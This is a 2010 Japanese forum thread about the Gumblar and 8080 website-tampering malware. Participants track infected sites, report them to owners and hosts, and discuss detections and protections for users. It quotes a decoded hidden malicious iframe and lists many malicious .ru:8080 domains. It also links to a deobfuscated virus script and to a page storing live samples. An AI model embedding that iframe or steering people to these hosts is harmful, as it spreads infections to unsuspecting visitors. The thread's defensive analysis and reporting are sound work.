Gumblar感染後、forhomessale.ru の名前解決に失敗してるっぽい、、、

それでもFTPアカウントは窃取されんのかな?
455名無しさん@お腹いっぱい。:2010/01/23(土) 11:09:57
>>452
Last-Modified: Fri, 22 Jan 2010 11:53:46 GMT
456名無しさん@お腹いっぱい。:2010/01/23(土) 11:53:40
>>442
似たようなサイト作ってるんで,そのメールアドレスから送信しておいたよ。
キャッシュにはAvast5反応してくれるんだけど,トップページのにはまだ
反応してくれない。次の更新で対応してくれてればいいけど。
457名無しさん@お腹いっぱい。:2010/01/23(土) 11:54:51
>>449
> ■Gumblar.cn(Gumblar、Gumblar.x)

Gumblar.xはGumblar(GENO)とは別にして欲しい
458名無しさん@お腹いっぱい。:2010/01/23(土) 12:13:26
459名無しさん@お腹いっぱい。:2010/01/23(土) 12:16:43
対応ってのは「改竄部分を消して元に戻す」って意味だろうな
鍵を代えるだの穴を塞ぐだのではなく
460名無しさん@お腹いっぱい。:2010/01/23(土) 12:31:42
>>458
乙です。
どんな対策か気になりますね
461名無しさん@お腹いっぱい。:2010/01/23(土) 13:28:40
>>460
期待は出来ないと考えた方がいいかもです

HPを作っている方は専門会社ではなく
ボランティアスタッフが作っているとか

映画チケットを貰ってるそうなので
無料奉仕ではなさそうですが
462名無しさん@お腹いっぱい。:2010/01/23(土) 14:12:08
>>448 でじろく
>>452 whois上流のとこ (´-`).。oO(届いてくれればいいなぁ…)
それぞれめる

>>461
お疲れ様です。
まだ直ってなかったので上流にめるしました。
463名無しさん@お腹いっぱい。:2010/01/23(土) 14:31:08
見逃してたm(_ _)m
>>456
乙です。
助かります。
464名無しさん@お腹いっぱい。:2010/01/23(土) 15:19:57
www●minami-aoyama●info/
genuinehollywood●ru:8080


札幌市公園緑化協会直ったんじゃなかったっけ?
リンク元はなさそうだから残骸っぽいけど、日付が
www●sapporo-park●or●jp/blog_odori/wp-includes/js/tinymce/utils/mctabs●js
Last-Modified: Fri, 22 Jan 2010 01:49:02 GMT

www●sapporo-park●or●jp/blog_nishioka/wp-includes/js/scriptaculous/dragdrop●js
Last-Modified: Fri, 22 Jan 2010 01:20:42 GMT
genuinehollywood●ru:8080


ちなみに、index●php はどうやってデコードしてるんですか?


465名無しさん@お腹いっぱい。:2010/01/23(土) 15:20:54
Vista/7でIEの保護モード使ってる奴すくなすぎだろ
保護モード使えばブラウザやプラグインのバグで無警告でやられるのなんて無いだろ
警告メッセージがでてOKだせばやられるとかだし
466名無しさん@お腹いっぱい。:2010/01/23(土) 15:30:03
>>465
埋め込み動画が再生出来ない・・・
ttp://www.katch.ne.jp/~kakonacl/burauza/burauza.html
467名無しさん@お腹いっぱい。:2010/01/23(土) 15:49:20
>>465
みんな使ってると思うが
統計でも取ったのか?
468名無しさん@お腹いっぱい。:2010/01/23(土) 17:00:25
>>465
今回は関係ないけど、常に穴があると思って用心したほうが良いよ。

ttp://slashdot.jp/security/article.pl?sid=10/01/21/0350220
NT以降の全ての32ビットWindowsバージョンでユーザー権限昇格を許すバグが見つかる

ttp://japan.zdnet.com/news/sec/story/0,2000056194,20407192,00.htm
マイクロソフト、32ビットWindowsカーネルの脆弱性について警告
469名無しさん@お腹いっぱい。:2010/01/23(土) 18:34:31
また火狐野朗がなんかいっちゃってるのか
LINDOWS?つかえって
470名無しさん@お腹いっぱい。:2010/01/23(土) 18:46:32
lindowsってザンドロスに吸収されたんだっけ
471名無しさん@お腹いっぱい。:2010/01/23(土) 18:53:00
Windows以外を使うってのも、ありと言えばありだろう。
472名無しさん@お腹いっぱい。:2010/01/23(土) 19:03:21
今頃になってこのスレ読んで、なんか甘く見ていた感
FxとIE8併用だけどIEはしばらく開かんとこう・・
AVも気休め程度のAVGじゃ不安だ。不安すぐる。
473名無しさん@お腹いっぱい。:2010/01/23(土) 19:11:44
なんか面倒だからブラウザから8080への通信をブロックすることにした。
ポート変われば意味ないだろうけど。
474名無しさん@お腹いっぱい。:2010/01/23(土) 20:17:21
対策してればFxもIEも同じだよ
475名無しさん@お腹いっぱい。:2010/01/23(土) 23:37:29
Gumblar[ガンブラー](複数の亜種を含む)ウイルスの感染拡大と対策のお願い
http://www.sakura.ad.jp/news/archives/20100119-004.news

ガンブラー再燃を契機にセキュリティの基本を見直そう
http://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security

埋め込みコード変えドメインも一新、拡散続ける正規サイト改ざん
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2130

ガンブラーと呼ばれている一連のサイト改ざん(Gumblar.x、8080)は、
ウイルスに感染したサイト管理者のパソコンから
サイト更新用のFTPアカウントを盗み出し、それを使って行っている。
SQLインジェクションのようにWebサイトの穴を探して入り込んでくるのではなく、
正面玄関から堂々と入って来てしまうのだ。
476名無しさん@お腹いっぱい。:2010/01/23(土) 23:44:34
電子立国の総本山、JEITAがガンブラー被害
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100121-OYT8T00741.htm?from=nwlb
477名無しさん@お腹いっぱい。:2010/01/23(土) 23:55:25
>>475
【トレンドマイクロ】
 \(^o^)/オワタ
478名無しさん@お腹いっぱい。:2010/01/23(土) 23:57:58
ガハハ
479名無しさん@お腹いっぱい。:2010/01/23(土) 23:58:09
またアンチウイルス戦争始めるのか
480名無しさん@お腹いっぱい。:2010/01/24(日) 00:21:20
ちょいオモロイ奴があったんだけど

http://ameblo.jp/suzu-gyosei/entry-10439409700.html
> 2010-01-21 15:50:20
> 当事務所のホームページ「カーポスト」が
> 年明けのいつごろかにgumplerにより改ざんされておりました。
> サーバー会社と連携して、現在感染しているファイルが
> ないことを確認致しました。

これって、/*GNU GPL*/が入ってるここのことだよな
http://www●car-post●jp/
Last-Modified: Tue, 19 Jan 2010 03:52:37 GMT

とりあえずgoogleさんに聞いてみよう
ttp://74●125●153●132/search?q=cache:lbVrFVlo7lYJ:www.car-post.jp/&cd=1&hl=ja&ct=clnk&gl=jp
このページは 2010年1月13日 16:13:55 GMT に取得されたものです

/*LGPL*/が入ってたんだな……えっ

某日 /*LGPL*/ ハケーン
19日 (/*GNU GPL*/入り)バックアップから復旧しますた
21日 サーバー会社と連携して、現在感染しているファイルがないことを確認致しました(キリッ!)

って話なのか
詳しい奴教えてくれ
481名無しさん@お腹いっぱい。:2010/01/24(日) 00:25:10
俺いまノーガードなんだけど、火狐の「RequestPolicy」ってアドオンだけで問題ないなw
>>448のサイトも、ちゃんとアクセスをブロックしてるログでてる。

この手の、他サイトへアクセスしてウイルスに感染させるタイプにすごく有効じゃね?
482448:2010/01/24(日) 00:27:55
>>5>>8(11)の感染確認をして記述やファイルがなく、カスペのフルスキャンで何も出てこなければ感染はしていないと思っていいのでしょうか?
WinXPSP3でKaspersky Internet Security 2010を使っています。
483名無しさん@お腹いっぱい。:2010/01/24(日) 00:32:33
>>482
亜種が生まれ続けているので感染していないと言い切れない
484名無しさん@お腹いっぱい。:2010/01/24(日) 00:34:16
>>480
http://www●car-post●jp/
いまみてきた
/*GNU GPL*/いたお
485名無しさん@お腹いっぱい。:2010/01/24(日) 00:35:48
>>480
サーバー会社もろとも終わってるな
halfsite.ruか
486名無しさん@お腹いっぱい。:2010/01/24(日) 00:37:14 BE:502926454-PLT(12031)
Microsoft Baseline Security Analyzer 2.1を使ったセキュリティスキャン
ttp://gumblarchecker.crz.jp/defend.html#mbsa
追加
487名無しさん@お腹いっぱい。:2010/01/24(日) 00:39:33
>>482
心配な場合はOS入れなおしが精神的にも安心安全
488名無しさん@お腹いっぱい。:2010/01/24(日) 00:40:17
>>480
RequestPolicyで確認したお!怪しいのブロックしてるお!ww
489名無しさん@お腹いっぱい。:2010/01/24(日) 00:41:14
次はRequestPolicyか
火狐野朗が
490名無しさん@お腹いっぱい。:2010/01/24(日) 00:48:13
>>486
491448:2010/01/24(日) 01:34:42
>>483,>>487
少し不安は残りますが>>6の更新とアンチウイルスソフトのアップデートをまめにしつつしばらくこのままで行こうと思います。
492名無しさん@お腹いっぱい。:2010/01/24(日) 01:37:37
>>464
上:さくら
下:そこだけじゃないことを確認/*Exception*/ blogがいくつか… 作業中

> index●php はどうやってデコードしてるんですか?
上のほうにあるスクリプトのこと?
メモ帳でガリガリ
493名無しさん@お腹いっぱい。:2010/01/24(日) 01:51:06
>>492勘違い>>464の下だけっぽい。。。orz......
作業にもどります。
494名無しさん@お腹いっぱい。:2010/01/24(日) 01:57:54
あー、/wp-includes/js/かお。。。
495名無しさん@お腹いっぱい。:2010/01/24(日) 01:57:59
>>444
粕は、まとめて検出の後任が
どうもTrojan-Downloader.JS.Gumblar.x (Gumblar) から
現段階Trojan-Downloader.JS.Pegel.c (.Pegel) になった模様。

ttp://www.kaspersky.com/viruswatchlite?search_virus=Gumblar
ttp://www.kaspersky.com/viruswatchlite?search_virus=Pegel

ペ? ペゲ? ペジ?
496名無しさん@お腹いっぱい。:2010/01/24(日) 02:01:11
ここは2ちゃんらしくプゲラウィルスと呼ぶべきかと。
497名無しさん@お腹いっぱい。:2010/01/24(日) 03:11:28
>>464
下:とりあえずwhoisからめる
498名無しさん@お腹いっぱい。:2010/01/24(日) 03:42:06
パトラッシュ、僕はもう疲れたよ・・・
ベンダーに任せるよ・・・
499名無しさん@お腹いっぱい。:2010/01/24(日) 03:42:52
>>480
これはもうどこに通報すればいいんだろ。。。
500名無しさん@お腹いっぱい。:2010/01/24(日) 03:51:12
>>480とりあえずwhoisからめる

大丈夫にゃんだろか。

ねるねるねるね
501名無しさん@お腹いっぱい。:2010/01/24(日) 04:10:54

  \           ■■          / 
   \         ■■■      \∧∧∧∧∧∧∧∧∧∧∧∧∧∧/ 
     \       ■■■■      < ━    ╋       ┓   ┃> 
      \     ■■■■    /< ━┓   ╋   ┃   ┃  ┃> 
        \   ■■☆■■  /  <  ┃ ┏╋━  ┃   ┃   > 
         \  ■■■■■/   <  ┃ ┗┛    ┗      ・> 
          彡|  ━  ━ |ミ   /∨∨∨∨∨∨∨∨∨∨∨∨∨\  
         彡彡|─◎─◎─|ミミ   
  ─────彡彡| ┌└ ┐ |ミミ─────────────── 
         彡彡| ───  |ミミミ 
        彡彡彡\\二/ /ミミミ   テーレッテレー♪
        彡彡彡▲\__/▲ミミミ   
       /彡彡▲■■■■■▲ミミ\     ねっておいしい
     / 彡彡 ■■■■■■■ミミ  \     ねるねるね〜るね♪
502名無しさん@お腹いっぱい。:2010/01/24(日) 07:17:50
> ガンブラー再燃を契機にセキュリティの基本を見直そう
> http://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security

俺たちの誤解なんだってさ

> ■変更履歴
> 記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクション
> によるものだという誤解を招く表現があったため、これを修正しました。
> [2010/1/22 15:40]


記念にDiffておくよ

*****【旧】
 ガンブラー攻撃によるWeb改ざん手口は、Webアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のWeb改ざんも、おそらくSQLインジェクションによるものだと推測しています。
*****【改】
 一般的に、Web改ざんの手口はWebアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のガンブラー攻撃によるWeb改ざんにも、SQLインジェクションが使われた可能性があると推測しています
*****

*****【旧】
 まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです。
*****【改】
 まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口にはSQLインジェクションが使われている可能性があるためです。
*****

*****【旧】
*****【改】
■変更履歴
記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクションによるものだという誤解を招く表現があったため、これを修正しました。
[2010/1/22 15:40]
*****
503名無しさん@お腹いっぱい。:2010/01/24(日) 07:24:22
修正されてもまだ誤解されそうだな。
どう見てもSQLインジェクションと関連付けたがってるようにしか見えない。
504名無しさん@お腹いっぱい。:2010/01/24(日) 07:28:40
念のため貼っとく

> 大辞林 第二版 (三省堂)
>
> ごかい 【誤解】
>
> (名)スル
>
> 事実や言葉などを誤って理解すること。思い違い。
> 「真意を―する」「―を招く」
505名無しさん@お腹いっぱい。:2010/01/24(日) 07:41:11
>>475
トレンドマイクロ醜態をさらしたなw
だいたい固定コンテンツしかないようなサイトまで被害にあってる時点でSQLインジェクション説は微妙なのにね
506名無しさん@お腹いっぱい。:2010/01/24(日) 07:43:21
>>502
セキュリティー企業なのにトレンドマイクロアホすぎるだろ
素人がやってんのか?
507名無しさん@お腹いっぱい。:2010/01/24(日) 08:17:50
>>505
htmlのような静的なコンテンツしか置けないGeocitysでも起こってるから100%あり得ない
508名無しさん@お腹いっぱい。:2010/01/24(日) 08:44:15
   ,,v‐v-/l_  (⌒)
  _「/ ̄  く   /
  lYノノ/_ノl_ヽ))
  <イ( l l )l>  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 <|)'|l、"(フノ|l  < えっちのような性的なコンテンツはいけないと思います!
  ,(ヨリ<>o<>リ']  \______________
  |ト‐!]-ム- i']l
  ヽ_ノv__l/ /
.  ノ[//‐─‐/_/、
 ( /E|,   (フlヨ \
 ,-| El___lヨ /
└-\`^^^^^^´/
509名無しさん@お腹いっぱい。:2010/01/24(日) 08:55:32
トレンドマイクロのWebサイト改ざん、Webアプリにぜい弱性の可能性
http://itpro.nikkeibp.co.jp/article/NEWS/20080312/296062/

ここから時計が止まってるんだ
きっとそうに違いない
510名無しさん@お腹いっぱい。:2010/01/24(日) 08:56:57
例の上映団体RCS

>一部のセキュリティソフトにおいて、
>当ホームページへのアクセス遮断や、
>感染警告の表示などが発生している様です。
>早急な対応を試みておりますが、
>じゅうぶんご注意ください。

改竄されてました,とは意地でも書かないのね
511名無しさん@お腹いっぱい。:2010/01/24(日) 09:21:45
ちょっとここでずらずらっとタイムラインを自分的に整理だらだらと羅列してみました。

恥ずかしいので Hide ::

まず、最初に事態が発生したのは 2009年3月ごろ
lite〜.cnとかいう変なドメインから
"drive by download"なる攻撃手法が発生しました。

当初、原因ははっきりせず、
やがて Adobe Flash/Readerの「最新版では塞がれている脆弱性」を
つかった自動マルウェア埋め込みの手法であることが判明しました。

これは、当時としては「なにタワゴト言ってるんだ」というレベルの
「Webを見ただけで感染」という手法であり、あまりそれを信用してもらえず、
セキュリティ各社もあまり報道せず、事態は水面下で流れていきます。

そして、運命の 2009.04.05 PC通販ショップのGENOで感染が確認され、
一度は感染コードの除去が行われたにもかかわらず、
再感染というセンセーショナルな事態を引き起こします。

GENOが感染した際には gumblar.cnではなく、
zlkon.lv(94.247.2.195 as hs.2-195.zlkon.lv)でした。
このときには単純な難読化コードに jQuery.js への誘導コードが記述され、
さらにそこからドライブ・バイ・ダウンロード攻撃のためのリンクに飛ばされました。

GENOが事あるごとに叩かれるのは、
「コンピュータを売ってる店がそんな認識でいいのか?」という部分と
「キャッシュを消せば大丈夫」ってあたり(笑)だとおもいますけど、

同時期に感染した楽天系の2つの店はもっと対応が酷かったことは
あまりしられておらず、
私的には 「GENOウィルス」という呼称は好きではアリマセン。
512名無しさん@お腹いっぱい。:2010/01/24(日) 09:23:48
>>511
ここで重要なことは従来言われていた
「怪しいサイトにいかなければ大丈夫」という神話が
崩壊したことです。

普通一般のどこにでもあるサイトが
ある日突然、陥落して毒を吐き出すようになる
というのは想像すらしていなかった
攻撃ベクトルになりました。

その後、94.247.2.195は応答停止となり、
終焉したかにおもわれましたが、
わずかのブランクの後、
初代Gumblar(Gumblar/Martuz)として凱旋してきました。
このとき、初めて事態の深刻さがわかりました。

初期の zlkon の攻撃時に「インストール」されていたマルウェアは
潜伏中に感染ノードからありとあらゆる情報を盗み、
一番有効な撹拌手段として、
FTPアカウントを盗んでサイトを改ざんし、
さらに感染者を増やすというねずみ講的手法に転じたのです。

しかも、このねずみ講には、大きな違いがありました。

zlkon.lv時代になかった
「感染しない環境には普通のコードを返す」という
逆発想的rootkit手法を導入したのです。

更にはIP制限により、一度マルウェアをダウンロードした相手には
一定期間配布しないという「ケチ政策」も施行されました。
513名無しさん@お腹いっぱい。:2010/01/24(日) 09:26:13
>>512
これにより、感染する可能性の低い環境には何も起きず、
脆弱性のある環境への「無差別ターゲット型」攻撃という
言語的にもにアリエナイ攻撃手法が確立しました。

この手法により脆弱性を放置していた環境にのみ爆発的に広まり、
かつ、普通にセキュリティ意識の高いユーザは何が起きているのかわからず、
セキュリティ会社は検体を取得できないという、
きわめて皮肉な結果が更なるパンデミックを引き起こしたのです。

しかも、この勤勉なマルウェア作者はほとんど毎日のように、
javascriptコード、マルウェア本体の更新を行い、
セキュ会社とのイタチゴッコなせめぎ合いの主導権を握り続けました。

このとき、悔やまれることは zlkon.lvのテイクダウンの際に、
(ITパスポートのCMをうつ金があるなら)
きちんとした対応策を
IPAあたりが音頭を取って報道等で告知していれば、
こんな事態になることはなかったのではないか?と思われることです。

しかし、まだこのときは救いがありました。

gumblar.cnもmartuz.cnも、単独のIPであり、
極端なことを言えばたった3つのIPを塞いでしまえば、
この攻撃は無効化されたのです。

そして、このことをいまだに引きずって
「危険なIP/TLDを塞げば大丈夫」という
幻想を生む皮肉な結果になりました。
514名無しさん@お腹いっぱい。:2010/01/24(日) 09:29:04
>>513
一方、攻撃手法として確立してしまった
ドライブ・バイ・ダウンロードは、
ますます嫌な進化を続け、
8080ポートへのリバースプロキシを悪用した攻撃が
水面下で進行していました。

この攻撃は、細かいスパンで切り替わる
5基のラウンドロビンを使った大量のドメイン投入で、
名称がつけられないまま 8080(仮)として、
延々とラウンドロビンを差し替えながら
感染ノードを増やしていました。

やがて、この 8080系も姿を消したかに見えた矢先の
2009年11月、
ScanSafeとKasperskyが突然アラートを発し、
「Gumblar復活」の烽火を上げたのです。

この新しいGumblar(Gumblar.X)は、
以前の gumblarよりも更に洗練された攻撃で、
その恐ろしく緻密に計算された陥落サイト群のヒエラルキー構成により、
幾つものBOTが、複数の役目を絡み合いながら機能する、
超並列Botサーバとなっていました。

しかし、この攻撃に使用されていた脆弱性は、
既に塞がれていたものばかりで、
これまで散々脅されていたユーザは
きちんと Adobe系の穴を塞いでいたため、
それほど深刻な事態にはなりませんでした。
515名無しさん@お腹いっぱい。:2010/01/24(日) 09:31:44
>>514
ところが、その背後で 8080系が古くい癖に極めて有効な
Java JREの脆弱性を取り入れ、
一気に感染ノードを広げにかかりました。

これは、日本において
メーカ販売のPCに「プリインストール」されており、
かつ自動更新の手続きがとられていないものが多いため、
一気に日本で拡散する原因となりました。

また、マルウェア誘導コードに有名な日本のドメインが
サブドメイン名やフォルダ名に羅列され、
ホワイトリストと単純なORチェックを行っている
IDSではスルーされてしまうという
悲惨な状況も確認されています。

しかも悪いことに
12月初旬に Adobe Readerの脆弱性が公表、
PoCが公開されたにもかかわらず

あー長かった。
というわけで、
もしウチ的に "Gumblar"って何?と応えるとするなら
「いやなもの」
ということでどうでしょう(殴)

UnderForge of Lack ≫ Blog Archive ≫ 2010.01.23 土曜日
http://www3.atword.jp/gnome/2010/01/23/jan-23-2010-sat/
516名無しさん@お腹いっぱい。:2010/01/24(日) 09:32:35
無理に小難しくひけらかし系文章書かなくてもいいから
517名無しさん@お腹いっぱい。:2010/01/24(日) 09:43:33
ふかいい話だな
518名無しさん@お腹いっぱい。:2010/01/24(日) 09:54:08
他人に何かを伝えるつもりが微塵もない、
単なるこれ見よがしな知識披露目的のオナニー記事だな。
519名無しさん@お腹いっぱい。:2010/01/24(日) 09:59:26
ヲタクなんてそんなもんだ
520名無しさん@お腹いっぱい。:2010/01/24(日) 10:04:24
>>511-519
自演乙
521名無しさん@お腹いっぱい。:2010/01/24(日) 10:13:30
>>520
ブログ主さん乙

とでも返されればご満足ですか?
522名無しさん@お腹いっぱい。:2010/01/24(日) 10:14:13
結局このウィルスの目的は、Web改ざんがしたかったの?
サイトの機密情報を盗みたかったの?
523名無しさん@お腹いっぱい。:2010/01/24(日) 10:15:25
botnetの構築
524名無しさん@お腹いっぱい。:2010/01/24(日) 10:17:29
>>510
なにこれ、頭にくる文章だな…
525名無しさん@お腹いっぱい。:2010/01/24(日) 10:22:01
読みにくいけど情報は正しいよね。
これを例のSQLインジェクション野郎に読ませるべき
526名無しさん@お腹いっぱい。:2010/01/24(日) 10:23:47
並列処理させるSETIみたいなもんか
527名無しさん@お腹いっぱい。:2010/01/24(日) 10:31:12
>>520
オナニープレイかよ死ね
528名無しさん@お腹いっぱい。:2010/01/24(日) 10:33:51
今思ったんだけどトレンドの人はconfickerと間違ったのでは。
529名無しさん@お腹いっぱい。:2010/01/24(日) 10:59:36
トレンドマイクロはバカでも課長になれます(キリッ
530名無しさん@お腹いっぱい。:2010/01/24(日) 11:18:10
>>527
違うよ。
531名無しさん@お腹いっぱい。:2010/01/24(日) 11:27:42
この課長は上がってきた報告書をこねくりまわして発表するのが仕事?
そもそも解析結果を理解できてるとは思えないんですけど
だめじゃん
532名無しさん@お腹いっぱい。:2010/01/24(日) 11:28:20
>>502
いっそのこと「最初からSQL云々なんて書いてない!ガンブラにやられて改ざんされたっ、
悔しいビクンビクン!、このように完璧の防御を誇るITProの高性能サーバまでハッキングする
恐ろしいウィルスなのであ〜る!」とか書いとけばいいのに。

.ru:8080コレクション
ampsguide anycitytown authentictype burkewebservices carswebnet easylifedirect
freeprosports funwebmail guidebat genuinehollywood genuinecolors
halfsite homeproair homesaleplus lagworld saletradeonline suesite sugaryhome
superaguide superpropicks theatticsale theaworld thechocolateweb
thelaceweb themobilewindow themobisite viewhomesale webdesktopnet
webdirectbroker webnetenglish webnetloans webnetenglish whosaleonline
worldsouth worldwebworld yourtruemate

きりがないなw 俺も8080ポートをアク禁するだけにしようかな
533名無しさん@お腹いっぱい。:2010/01/24(日) 11:45:18
>>532
むしろ、80と443のみ許可で
534名無しさん@お腹いっぱい。:2010/01/24(日) 12:04:00
>>515のつづきってあるの?
そこに書いてあるアドレスに書いてあるの?
無関係?

知らないアドレスは踏みたくないんだけど続きがあるなら見たい。
535名無しさん@お腹いっぱい。:2010/01/24(日) 12:17:21
無理して踏まなくていいですよ
536名無しさん@お腹いっぱい。:2010/01/24(日) 12:19:59
p://yamataiyou●sakura.ne●jp/

ここをFirefoxのview-sourceで表示して、それを、ファイル>名前を付けてページを保存>
ファイルの種類は「Web ページ、HTML のみ」で保存してvirustotalすると
結果: 10/41 (24.4%)になるのだが、俺はhtmlとかにあまり詳しくないので
単純にIframeに反応した誤検出なのかどうかが良く分からない

ttp://www.virustotal.com/jp/analisis/592e666dd50c92ea7fe7c24af8d77b284d49d91c008675001e332a7945652c6f-1264302239
537名無しさん@お腹いっぱい。:2010/01/24(日) 12:29:15
>>536
GumblarChecker 2にかけたら、avastがプァーン
HTML:IFrame-GC [Trj]
538名無しさん@お腹いっぱい。:2010/01/24(日) 12:50:15
>>536
<iframe name=c10 src='p://●net/.go/check.html' width=262 height=196 style='visibility:hidden'></iframe>
アスキーコード埋め込みでそのあとurlエンコードしたら上記が出てきた
誤検知っぽい
539名無しさん@お腹いっぱい。:2010/01/24(日) 12:59:20
>>538
すまん、ドメイン検索するとウイルス配布サイトらしいな
gogo2me●net
540536:2010/01/24(日) 13:11:21
回答くれた>>537>>538>>539ありがとう
gogo2me●netでぐぐると結構出てくるね
541名無しさん@お腹いっぱい。:2010/01/24(日) 13:58:42
ttp://japan.cnet.com/news/sec/story/0,2000056024,20099577,00.htm
所詮、トレンドマイクロの社員はこの程度ですから・・・
542名無しさん@お腹いっぱい。:2010/01/24(日) 14:02:48
>>491
感染後に予防しても意味ないわ
風邪ひいた後にみかん食ったって治らないだろ
543名無しさん@お腹いっぱい。:2010/01/24(日) 14:29:13
まっ、神経質になってるのは最初のうちだけだと思うけどね^^;
インフルエンザの時もマスクしてたのは最初だけだったし^^;

まっ基本的(手洗いうがい=最新のパッチ)なことは気にするようになったんじゃないの

無神経な奴は、何があったも気にしないから無理かも^^;
544名無しさん@お腹いっぱい。:2010/01/24(日) 14:32:49
>>541
サクサク軽快〜♪ サクサク軽快〜♪ ウイルスバスター!!
販売本数No.1!! 選んだ貴方は・・・

パソコン\(^o^)/オワタ
545名無しさん@お腹いっぱい。:2010/01/24(日) 15:02:56
ウイルスバスター(笑)が売れているのは日本ぐらいだろ・・・
546名無しさん@お腹いっぱい。:2010/01/24(日) 15:18:26
BCNランキング2009年12月 - セキュリティソフト
ttp://bcnranking.jp/category/subcategory_0019_month.html
547名無しさん@お腹いっぱい。:2010/01/24(日) 15:59:45
NTTのやついれてるけど
これはタダならまあいいよね

カスペノートンアバストfセキュレ色々入れてウイルスかかったことなんかないからわからんけど
548名無しさん@お腹いっぱい。:2010/01/24(日) 16:07:00
kidsparlour●biz/
www●kidsparlour●net/
まだ対処してませんね
549名無しさん@お腹いっぱい。:2010/01/24(日) 16:15:00
古いホームページだから放置するんじゃね
550名無しさん@お腹いっぱい。:2010/01/24(日) 16:15:59
cometruestar.ru
551名無しさん@お腹いっぱい。:2010/01/24(日) 16:26:33
www●minami-aoyamama●info
こんなとこもまだ
552名無しさん@お腹いっぱい。:2010/01/24(日) 16:33:43
今朝VIPで騒いでいたやつ
www●deeplove2●com/index_2.html
553名無しさん@お腹いっぱい。:2010/01/24(日) 16:40:10 BE:201170742-PLT(12031)
554名無しさん@お腹いっぱい。:2010/01/24(日) 16:59:15 BE:1584217679-PLT(12031)
555名無しさん@お腹いっぱい。:2010/01/24(日) 18:21:13 BE:301756043-PLT(12031)
http://www.dotup.org/uploda/www.dotup.org589732.txt.html
virus
解析して難読化解除・コメント追加したもの

メールの内容を盗んだり色々してるね
556名無しさん@お腹いっぱい。:2010/01/24(日) 18:38:15

だけど553と554のファイル内容一緒だ
557名無しさん@お腹いっぱい。:2010/01/24(日) 18:48:21 BE:150878232-PLT(12031)
>>556
あら・・本当だスマン
554はこれね ttp://www.dotup.org/uploda/www.dotup.org589804.txt.html
555にWinampの〜て書いてあるけどあれは間違えてた、正しくはDirectShowの脆弱性を使うものだ
558名無しさん@お腹いっぱい。:2010/01/24(日) 19:34:03
どもです。
まあ見てもわけわからんのですが、一般人は現状の対策でおkってことでいいの?
559名無しさん@お腹いっぱい。:2010/01/24(日) 19:38:55
おk
560名無しさん@お腹いっぱい。:2010/01/24(日) 19:40:54
読んでわかったことは・・
・古いIEだとヤヴァイ、ネット上にある任意のexeファイルを実行可能
・IEはActiveXを実行しないようにしたらすべて回避可能
 ([インターネットオプション]から[セキュリティ]タブの[インターネット]ゾーンのセキュリティレベルを[高]にするだけ)
・IE以外はJavaを切れば回避可能
・Flashは使われてない
561名無しさん@お腹いっぱい。:2010/01/24(日) 19:48:08
日々変化しているし1パターンだけじゃなかったはず
今回偶然使ってなかっただけだろうから
例えば他スレで使ってないと断言するのは危ないよ
562名無しさん@お腹いっぱい。:2010/01/24(日) 19:53:43
どっちにしても>>6を行っておけば問題ないのは変わらない。
563名無しさん@お腹いっぱい。:2010/01/24(日) 19:54:20
まあそうだがこれだけはいえる
”IEは使わない方が良い”

コードの9割がActiveX依存、ActiveXを除けば残るのはJavaのみ
564名無しさん@お腹いっぱい。:2010/01/24(日) 19:56:54
>>560
俺も読んでも分からない人なのだけど

> ・古いIEだとヤヴァイ

古いってIE6とかのバージョンっていう意味?
565名無しさん@お腹いっぱい。:2010/01/24(日) 20:02:04 BE:100585722-PLT(12031)
>>564
IE6はまだサポート期間内だからパッチが提供されてるのでアップデートをきちんとしていれば大丈夫、してないなら危険
IE5.5以前は危険
566名無しさん@お腹いっぱい。:2010/01/24(日) 20:03:56
>>565
了解。回答ありがとう
567名無しさん@お腹いっぱい。:2010/01/24(日) 20:37:13
www●forms-inc●com/nicoletti/

よく分からないんだが、
ここ開こうとしたらNODに止められたんだけど、
ガンブラー感染してるって事?
568名無しさん@お腹いっぱい。:2010/01/24(日) 20:40:46
/*Exception*/
感染してる
569名無しさん@お腹いっぱい。:2010/01/24(日) 20:48:30
>>568
そうなんだ。ガンブラー怖いな・・
回答thx
570sage ◆sage/xLnlI :2010/01/24(日) 20:49:28
明日仮装pcで新しいコード拾ってこなくちゃ

こんどはどんなページに汁かな・・・
もちろん踏ませるのではなく本体を拾ったりしてもらうためにやっているのです



http://www16。atpages。jp/filedl
ガンブラー置き場
たぶんこのアドレスまで安全、進むと危険
571sage ◆sage/xLnlI :2010/01/24(日) 20:53:18
下げ忘れすまん
572名無しさん@お腹いっぱい。:2010/01/24(日) 21:21:03
海外の串サイト調べてたらいきなりMSEがTrojan:JS/Agent.FA検出した
これはGumblar・・・じゃないか
573472:2010/01/24(日) 21:26:11
>>474
そうスか…テンプレの対策はしてるけど、IEはなんかもう
使う気しなくなってもうた。「〜感染してみた」
の記事じっくり読んできたけどIE6がヤバイんですね。

Firefox+NoScriptでも迂闊に許可できないなぁと

574名無しさん@お腹いっぱい。:2010/01/24(日) 21:33:25
>>548
下のwhoisにめるぽ
上のwhoisは戻ってきちゃった。。

>>551
さくらにつーほー済み>>492

>>552
whoisからめる
575名無しさん@お腹いっぱい。:2010/01/24(日) 21:49:15
>>573
嫌になってmacmini買った
macだから安全ってことはないんだけどね
576名無しさん@お腹いっぱい。:2010/01/24(日) 22:10:52
>>567
whoisからめる
577名無しさん@お腹いっぱい。:2010/01/24(日) 22:13:19
>>572
Trojan:JS/Agent.FAタイプのGumblarは知らないなあ
578名無しさん@お腹いっぱい。:2010/01/24(日) 22:13:59
>>574,576
乙です
579名無しさん@お腹いっぱい。:2010/01/24(日) 22:28:13
IE6使ってて感染した人にはセキュリティソフト関係なしに自己責任だろう
8にバージョンアップしない自分が悪い
580名無しさん@お腹いっぱい。:2010/01/24(日) 22:29:07
reefcheck●net
NODが反応
JS/TrojanDownloader.Agent.NRL
581名無しさん@お腹いっぱい。:2010/01/24(日) 22:37:31
